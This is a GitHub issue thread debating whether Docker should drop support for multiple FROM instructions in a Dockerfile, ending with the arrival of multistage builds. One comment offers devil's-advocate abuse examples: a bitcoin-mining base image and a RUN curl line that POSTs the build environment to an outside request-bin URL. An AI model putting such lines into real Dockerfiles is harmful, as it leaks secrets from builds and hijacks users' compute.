Proposal: remove support for multiple FROMs in Dockerfile #13026

Closed
duglin opened this issue May 6, 2015 · 44 comments
Labels
area/builder, impact/dockerfile, kind/feature (functionality or other elements that the project doesn't currently have; features are new and shiny), status/needs-attention (calls for a collective discussion during a review session)

Comments

@duglin
Contributor

duglin commented May 6, 2015

See #5603 for some history.

Allowing for multiple images to be built from a single Dockerfile (via multiple FROM commands), while interesting, isn't fully supported. In particular, the non-final images that are produced are not easily found without some ugly parsing of the build output. It would then also lead to people wanting to do things like add TAG commands to tag each image so they're easily used/found.

I think there are two options:

  1. complete the "multiple FROM" support we have by making it easier for people to find/use those intermediate images.
  2. remove support for multiple FROMs until we figure out exactly how people are supposed to use it.

This issue is to get the conversation started and to propose option 2 - remove it.

Question: are people using this feature today and if so what are the usecases for it?

@ewindisch
Contributor

I am not using this feature in production and believe it should be dropped. As a devil's advocate, here are some places I see it being (ab)used:

Bitcoin tipping

# Donate 2 minutes of CPU cycles toward mining bitcoins for ewindisch
FROM ewindisch/bitcoin-tipping-image
# We now return you to your program...
FROM ubuntu:utopic

Logging / reporting

FROM buildpack-deps:curl
RUN curl -X POST -d "$(env)" http://requestb.in/x2fgrbx2
FROM ubuntu:utopic

Multi-stage building

# NOTE: I cannot attest to the safety of using cgswong/aws... it's not-invented-here!
FROM cgswong/aws
ADD dot-aws /root/.aws
ADD src /src
WORKDIR /src
# Having a golang compiler in the image would make this work ;-)
RUN go build main.go
RUN aws s3 cp . s3://mybucket/mybuild --recursive 
FROM buildpack-deps
# This is all kinds of wrong? ;-)
RUN curl -o /usr/bin/main https://my-bucket-url/mybuild/main

I could see the multi-stage building being legitimately useful if volumes could be shared between builds?

@thaJeztah
Member

Thanks for opening @duglin!

@duglin
Contributor Author

duglin commented May 6, 2015

I can't help but think that we should find a better way to solve these usecases than to use FROM.

There are times when I think some kind of 'make' thing that sits on top of 'docker build' would be useful. It would probably end up overlapping with Compose too much but perhaps nested builds are more what people want. Dunno, but it might be an interesting topic for a break-out session at DockerCon to see what the requirements are for these non-trivial builds.

@thaJeztah
Member

Dunno, but it might be an interesting topic for a break-out session at DockerCon to see what the requirements are for these non-trivial builds.

Actually, good idea. I think there are various feature requests that could benefit from a good discussion to see what users are looking for, use-cases etc. Not all users are active on GitHub and it would help the maintainers make better choices (instead of "guessing" what would be useful in some cases). (Won't be there myself :/ ... Skype call? :))

@ewindisch
Contributor

@duglin @thaJeztah there have been some discussions about doing the dockerfile parsing on the client-side and using the client to drive the build. /cc @shykes

@duglin
Contributor Author

duglin commented May 8, 2015

If we do remove multiple FROMs, does that reduce the need for the MARK/SQUASH stuff in #12198 ? By that I mean, I know people will still want to squash stuff but if we limit you to one image per Dockerfile, will just an operation at the docker cmd level (on images) be sufficient ?

@thaJeztah
Member

@duglin like the original "squash" implementation? #4232 (Oh, according to #4232 (comment) we don't need a squash :))

@duglin
Contributor Author

duglin commented May 8, 2015

oh wow - so much history :-)

@WhisperingChaos
Contributor

@duglin

Multiple FROMs enable the separation of build-time and run-time concerns. Essentially, build tool chains are performed within the context of one or more FROM statements producing either intermediate artifacts, to be further processed by other FROM statements, or final products. At the termination of a build-time FROM, the initial build context is extended to include its intermediate or final products, so that they are available to the next FROM context. Eventually, the last FROM, the one that doesn't extend the build context, simply contains a single ADD operation to produce the entire file system and any other Dockerfile commands like ENV, EXPOSE, or ENTRYPOINT needed to configure the run-time image. This process generates the smallest sized run-time image with the minimal number of layers and preserves the potentially highly layered build-time image cache, to improve subsequent build performance, especially if cache misses are isolated to only a specific FROM.

There are two open Proposals that detail how to achieve the above with two mechanisms:

  • Proposal: Extending Build Context with Intermediate State #12415 : Extends the uploaded build context with intermediate files, like compiled executables, from committed build-time containers. It essentially bind mounts one or more directories within a committed container, generated when running the build, to the root directory of the build context.
  • Proposal: Dynamic Coupling via Local Build Context #12072 : Maps, in a read only way, the directory structure of the build context to present a virtual directory structure that corresponds to the one required by a given FROM statement. Think of it as creating a directory structure comprised entirely of symbolic links that conforms to what's needed by FROM and its associated Dockerfile commands. It's also similar to a SQL SELECT/CREATE VIEW in that you can partition/rearrange the build context directory structure, including its files, to reflect any desired 'shape'.

Read #12415 TLDR and view its Example, as it concisely demonstrates both mechanisms.

If the above mechanisms were implemented, FROM statements would no longer be executed sequentially but instead ordered by their dependencies, very much like a makefile.

@duglin
Contributor Author

duglin commented May 16, 2015

@WhisperingChaos but none of what you're talking about can be done today - and that's my point. Unless we take on the task of making the use of FROM actually useful (perhaps with some of the proposals you mentioned) then we might as well remove it. So, this issue is to force the discussion - either we "fix" it so that multiple FROMs can be useful or we drop it. But leaving a 1/2 implemented feature that doesn't seem to do much good seems silly.

@WhisperingChaos
Contributor

@duglin

none of what you're talking about can be done today

Agree, but I'm suggesting that multiple FROM support be continued and enhanced as per the first option stated in the initial post:

I think there are two options:

  1. complete the "multiple FROM" support we have by making it easier for people to find/use those intermediate images.

My initial reply not only presents the reasoning to support multiple FROMs but also suggests mechanisms to realize its benefits. BTW, the mechanisms presented in the referenced proposals aren't new, like extending the build context, as it appears in Nested Build #7149. They've just been repackaged in a manner to avoid, in the instance of Nested Build, harmful coupling.

@WhisperingChaos
Contributor

@duglin

If we do remove multiple FROMs, does that reduce the need for the MARK/SQUASH stuff in #12198

Nope.

For example, using a single FROM to build a golang app using the google/golang-runtime as a base image will include the golang tool chain, and the entire build context: go source files, the Dockerfile... including them as various layers in the resultant image. The entire tool chain, Dockerfile, and go source files... are completely unnecessary. All that's required is the compiled executable and perhaps a couple libraries. This behavior isn't specific to google/golang-runtime.

In fact, enhancing/extending multiple FROMs would eliminate the need for MARK/SQUASH, as the tool chain would exist and execute within the environment of a build-time FROM, preserving the semantics of the cache, with the resultant files simply copied as a single layer to a second FROM representing the resultant run-time image.
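
To make the single-FROM problem concrete, here is a minimal sketch of such a build. The `golang` base image, the `/src` path, and the `main.go` file name are illustrative assumptions, not taken from the projects mentioned above.

```dockerfile
# Single FROM: every instruction below contributes a layer to the final image.
FROM golang
# Adds the entire build context (Go sources, the Dockerfile itself, ...) as a layer.
COPY . /src
WORKDIR /src
# The compiler and the sources remain in the image,
# even though only the compiled binary is needed at run time.
RUN go build -o /usr/local/bin/main main.go
ENTRYPOINT ["/usr/local/bin/main"]
```

The resulting image carries the whole toolchain and the source tree alongside the one executable that is actually required, which is the overhead described above.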

@WhisperingChaos
Contributor

@ewindisch

Although I agree removing multiple FROM support would require some additional effort to encode the exploits, it wouldn't eliminate them. One could introduce a script executed by a RUN command to implement these exploits, as they rely on access to the Dockerfile.

In fact, it would be less noticeable to use a single FROM whose specified image included a compromised FROM in its construction.

@WhisperingChaos
Contributor

@duglin Why?:

I can't help but think that we should find a better way to solve these usecases than to use FROM.

There are times when I think some kind of 'make' thing that sits on top of 'docker build' would be useful. ...

@duglin
Contributor Author

duglin commented May 24, 2015

Well, the bitcoin one seems like a curl would work just as well (if I'm
understanding what's going on). And the logging one is just curl too so
why use FROM at all?
The multi-stage building, or the ability to generate multiple images
per Dockerfile, is the only usecase for multiple FROM that makes any sense
to me. Which is the point of this issue. Unless there's the desire to
turn a Dockerfile more into a Makefile where it can be used to fully
describe how to create multiple images (which, btw I would like), then
I think we should reduce things down to the model of single Dockerfile
makes a single image, but then provide some tooling to sit on top to
manage the multi-image need. Compose might help here, but I'm not sure
it's a perfect fit (yet).

@WhisperingChaos
Contributor

Well, the bitcoin one seems like a curl would work just as well (if I'm
understanding what's going on). And the logging one is just curl too so
why use FROM at all?

I would not support these use cases, but FROM in these situations helps to simplify the coding through encapsulation and its contents don't pollute the other FROM.

The multi-stage building, or the ability to generate multiple images
per Dockerfile, is the only usecase for multiple FROM that makes any sense
to me.

Agree.

...Dockerfile more into a Makefile where it can be used to fully
describe how to create multiple images (which, btw I would like),..

That's my intent too.

I think we should reduce things down to the model of single Dockerfile
makes a single image, but then provide some tooling to sit on top to
manage the multi-image need.

What tooling would be necessary?

Why would the solution be dependent on Compose?

Although Compose will permit you to build an image from a Dockerfile, it primarily establishes 'run-time' properties of the built image. Therefore, I'm struggling to understand how Compose would generate a multi-stage build for a single image?

I didn't notice a means of specifying static build-time image dependencies. For example, suppose a service named 'client' inherits its definition from 'service'. How does Compose 'build' know to construct the 'service' first, then the 'client'?

It might be problematic for docker build to rely on a component, like Compose that might not be installed, or whose implementation differs from Docker's version of Compose. In other words, should docker build's functionality be fully encapsulated within itself in order to cleanly support Docker's stated goal of a 'pluggable' infrastructure?

@duglin
Contributor Author

duglin commented May 24, 2015

@WhisperingChaos I agree on the compose stuff, and that was sort of my point. I think, right now, the closest thing we have to tooling that sits on top of vanilla Docker that even comes close to dealing with multiple images is Compose. But even that's not that close.

re: other tooling... well, I think tooling to help do things like squash images to remove layers. Or tooling to help build one image while in the middle of building another (nested builds). That kind of stuff. A lot of this just depends on what Docker is meant to be - just a single unit (building block) in a bigger puzzle or should it try to do more. It's a fine line, but right now I'm leaning more towards it doing more since I'm convinced (for now) that higher-level tooling to do some of these things will make the UX too complicated and less seamless.

@WhisperingChaos
Contributor

@duglin

re: other tooling... well, I think tooling to help do things like squash images to remove layers.

Why is squash necessary?

I would suggest that Squash is unnecessary if:

  • running tool chains, etc... can be isolated to a build-time container,
  • and an addressability mechanism permits build-time container artifacts to be transferred to intermediate build-time images and the resultant run-time image,
  • and a mechanism allows the formulation of the resultant file system, projected as the final build context for the resultant image.

Given these conditions, the resultant file system can be minimally copied as a single ADD . / for any image. However, when desired, the resultant file system could also consist of more than one layer. For example, the resultant image could be constructed by inheriting an ubuntu image and then adding only the final artifacts from the build-time containers. This would limit a pull request of the resultant image to only the added final artifact layer if the ubuntu image had already been downloaded. Also, in this situation, build-time containers would associate themselves via a 'used by' relationship instead of an inheritance one. 'used by' image relationships would not be copied when pulling an image.

Or tooling to help build one image while in the middle of building another (nested builds).

The nested/chained build implementations: #7115, #7149, and #8021 are problematic as discussed by these posts:

I would be interested in links to other nested build proposals that your post may be referring to, in order to review their implementations.

...Docker is meant to be - just a single unit (building block) in a bigger puzzle or should it try to do more...

Multi-stage building should be supported for a single unit (resultant image). However, I'm unsure that docker build needs a mechanism to build more than one resultant image. The only reason for a more comprehensive mechanism that constructs several images at once would involve a shared static dependency, like a shared parent image or shared protocol, that must be synchronized in order for new, cooperative image versions to successfully interoperate. Currently, I use a tool to manage these dependencies locally and will employ Docker Hub's "Repository links" feature when publicly publishing through Automated Builds.

Yes, so my docker build relies on tools external to docker build to properly build artifacts. Somewhat hypocritical...

@jessfraz added the kind/feature label and removed the kind/feature and kind/proposal labels Sep 8, 2015
@arun-gupta
Contributor

When is this planned to be deprecated?

@duglin
Contributor Author

duglin commented Oct 25, 2015

gotta get some buy-in from other maintainers first....

@duglin added the status/needs-attention label Nov 23, 2015
@duglin
Contributor Author

duglin commented Nov 23, 2015

Adding "needs-attention" label so we can discuss this at some point. We just need to make a decision one way or the other on this.

@sheerun

sheerun commented Dec 1, 2015

If you decide to remove this feature, I'd like to see a clean solution for multistage builds (e.g. build a static website with a webpack image, and then package the result with an nginx server from another base image).

@thaJeztah
Member

@sheerun could you expand on your use case, perhaps a very basic example showing how you're using this feature?

@sheerun

sheerun commented Dec 2, 2015

It's similar to the multi-stage building @ewindisch mentioned. The first part has FROM set to tutum/buildstep to build the image with webpack; I upload the result to my private server, and then download it in the second part of the Dockerfile, which has FROM set to dockerfile/nginx.

It's hacky but I'm not aware of any other way to do a multi-stage build. Any ideas?

@thaJeztah
Member

I think many people use a separate build container (e.g. https://github.com/docker-library/hello-world/blob/master/update.sh) but that won't work with automated builds. I personally think that nested builds may be a good replacement for that; #7115

@sheerun

sheerun commented Dec 2, 2015

Anything will do as long as I can do the following:

  1. Run sub-builds from within my build.
  2. Export paths from previous builds (so we need to be able to name previous builds..)

Running sub-builds is already handled by the FROM command, but they are pretty useless, because we can't interact with their results. I imagine something like this:

NAME dev_build
FROM dockerfile/nodejs
ADD ./ /app
WORKDIR /app
RUN npm install
RUN npm run build

FROM dockerfile/nginx
COPY dev_build:/app /var/www/html

The resulting build has all properties of dockerfile/nginx and dev_build is discarded.

So I'd be happy with the following changes to Dockerfile:

  1. Introduce NAME command to name FROM builds
  2. Extend COPY syntax to allow to reference other builds (similarly to docker cp)

// EDIT
This also allows builds to run in parallel, blocking on a COPY command when it references a build that is still running

// EDIT 2
I also imagine extension of -t flag of docker build command, so we are able to export named builds:

docker build -t sheerun/app_development:dev_build sheerun/app_runtime .

The command above would export dev_build named build to sheerun/app_development tag, and the default build to sheerun/app_runtime tag. Any builds that are not exported, are discarded.

@JAremko

JAremko commented Dec 4, 2015

Nested builds could be really great for the "from scratch" containers as they require a host system for the executable to be built on.

@jakirkham

+1, @duglin

While I would love to see a useful FROM possibly like multiple inheritance or extracting files from images or similar, I think the current broken implementation is standing in the way of actually trying any of those proposals. In short, I think this should go through a deprecation cycle and be removed. Only then can we really begin to think what multiple FROMs should do.

@sleaze

sleaze commented Mar 7, 2016

+1 for docker multiple inheritance functionality.

@gravis

gravis commented Apr 16, 2016

I'm using multiple FROMs in my images, to aggregate services. Please do not remove this feature :)

@duglin
Contributor Author

duglin commented Apr 16, 2016

@gravis can you elaborate on what you mean? It's not like it merges them

@gravis

gravis commented Apr 16, 2016

Since I'm using the same base (debian jessie), I can create a composite docker image instead of docker-compose files, i.e.:

FROM nginx
FROM postgres
...

@gravis

gravis commented Apr 16, 2016

hmm, the nginx env vars are not available in this case :(
Too bad

@thaJeztah
Member

@gravis you won't get both "nginx" and "postgres" in a single image with that Dockerfile; it will just start two builds after each other. Basically your example will do;

FROM nginx

and build that (without tagging it)

Followed by

FROM postgres
....

and build that, giving it the tag/name you specified during your build

@vdemeester
Member

@gravis it's more than that. Anything in nginx will not be available in the final image (the latest FROM takes over whatever came before); Dockerfiles are not composable.

@gravis

gravis commented Apr 16, 2016

Just saw that in my tests, forget my comments please :)

@gravis

gravis commented Apr 18, 2016

To conclude, I fully agree, having multiple FROM in a Dockerfile is an awful/dangerous practice, and must be avoided.

@C0deH4cker

If a command TAG were added that allowed tagging the image at that point in the Dockerfile, it might make more sense to allow multiple FROM commands. In that use case, you could have one FROM, run whatever commands are needed to produce your new image, have a TAG myfirstimage, and then another FROM and finish the Dockerfile. As with the way it works now, the image name/tag specified on the command line will be associated with the final image id at the end of the Dockerfile, but a single Dockerfile could tag various states along the way as well.

@xenoterracide

xenoterracide commented Dec 23, 2016

Hmm... I'm not sure I agree that having multiple FROMs is a bad idea, but if it works (and I didn't know it existed until finding this, so I haven't tried it) it should work as a flattened composition (https://en.wikipedia.org/wiki/Trait_(computer_programming)). Perhaps, though, an alternate syntax: FROM alpine:latest WITH java-alpine:latest, ruby-alpine:latest where foo acts like inheritance and is a base image like alpine or ubuntu, but you could have some way to define bar and baz, like java and ruby, so that you could easily compose languages (or other applications) into a single image.

Food for thought.

@AkihiroSuda
Member

Now we have multistage Dockerfile.

Can we close this?
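
For readers arriving at this thread later, here is a minimal sketch of how the webpack/nginx use case discussed above might look with multi-stage syntax (`FROM ... AS` plus `COPY --from`). The image tags, the `/app/dist` output directory, and the nginx document root are illustrative assumptions, not taken from anyone's actual project.

```dockerfile
# Build stage: contains the Node.js toolchain and is given a name
# so that later stages can refer to it.
FROM node:18 AS dev_build
WORKDIR /app
COPY . /app
RUN npm install
RUN npm run build

# Runtime stage: only this final stage ends up in the image tagged by `docker build -t`.
FROM nginx:stable
# Copy just the build output from the named stage; the toolchain and sources are left behind.
COPY --from=dev_build /app/dist /usr/share/nginx/html
```

Earlier stages are not part of the final image, so the runtime image stays small while the build stage's layers can still be cached between builds. Passing `--target dev_build` to `docker build` stops at the named stage if that image is wanted instead.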

@sheerun

sheerun commented Apr 9, 2017

I guess so, it pretty much covers this use case. It would be nice to export any image from multistage build, though: #32063 (comment)

@thaJeztah
Member

let's close this one, yes
